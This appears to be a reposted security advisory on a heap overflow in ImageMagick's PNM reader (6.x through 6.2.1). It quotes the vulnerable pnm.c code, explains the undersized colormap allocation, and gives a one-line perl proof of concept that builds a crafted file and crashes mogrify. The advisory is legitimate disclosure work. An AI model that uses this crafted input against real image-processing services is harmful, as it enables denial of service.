|
Brought to you by:
Suppliers of:
|
|
|
| |
ImageMagick is "a free software suite to create, edit, and compose bitmap images. It can read, convert and write images in a large variety of formats".
Remote exploitation of a heap overflow vulnerability in ImageMagick's ReadPNMImage function allows execution of arbitrary code or cause denial of service. |
| |
Credit:
The information has been provided by Damian Put.
The original article can be found at: http://www.overflow.pl/adv/imheapoverflow.txt
|
| |
Vulnerable Systems:
* ImageMagick versions 6.x up to and including 6.2.1.
Immune Systems:
* ImageMagick version 6.2.2.
Heap Overflow Vulnerability:
A heap overflow exists in ReadPNMImage() function, that is used to decode a PNM image files.
The vulnerable code in pnm.c:
static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
if ((format == '1') || (format == '4'))
max_value=1; /* bitmap */
else
max_value=PNMInteger(image,10);
image->depth=max_value < 256 ? 8UL : QuantumDepth;
if ((format != '3') && (format != '6'))
{
image->storage_class=PseudoClass;
image->colors=(unsigned long) (max_value >= MaxColormapSize ? MaxColormapSize : max_value+1);
}
...
if (AllocateImageColormap(image,image->colors) == MagickFalse)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
if (format == '7')
{
/*
Initialize 332 colormap.
*/
i=0;
for (pixel.red=0; pixel.red < 8; pixel.red++)
for (pixel.green=0; pixel.green < 8; pixel.green++)
for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
{
image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
i++;
}
}
Its possible to manipulate with image->colors value, because it's attributed to "max_value" or MaxColormapSize variable. Allocation of memory for image->colormap is based on image->colors variable (AllocateImageColormap() function).
If value of "image->colors" is for example 1, only 1*sizeof(PixelPacket) bytes of memory were allocated. Next, when format of PNM file is "7", image->colormap buffer is initialized by 332 colormaps. If image->colors*sizeof(PixelPacket) bytes are not enough for it, heap structures are overflowed. We cannot control contents of this buffer, so execution of arbitrary code is very difficult or impossible, but to crash it is easy.
Proof of Concept:
Example of crafted PNM file:
bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm
Test vulnerability with "mogrify" - standard ImageMagick utility:
bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$
|
|
|
|
|
